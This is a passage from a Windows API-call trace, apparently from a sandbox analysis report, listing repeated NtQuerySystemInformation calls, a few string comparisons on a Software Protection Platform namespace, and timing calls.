SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0270.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9c8, Length=0x50, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0270.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0270.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x28, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x28, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0270.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0270.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x28, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x38, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x20, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x28, ResultLength=0x0) [0270.962] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb40, Length=0x28, ResultLength=0x0) [0270.962] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0270.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0270.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x50, ResultLength=0x0) [0270.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x28, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x28, ResultLength=0x0) [0270.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0270.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0270.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x20, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x38, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.972] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcc20 | out: lpSystemTimeAsFileTime=0xc751dfcc20*(dwLowDateTime=0x2c80887, dwHighDateTime=0x1d5fb6f)) [0270.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0270.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0270.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb28, Length=0x50, ResultLength=0x0) [0270.972] GetTickCount () returned 0x11840df [0270.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0270.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0270.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0270.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0270.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0270.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0270.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x28, ResultLength=0x0) [0270.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0270.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0270.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0270.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0270.989] NtQuerySystemInformation (SystemInformationClass=0xb9, 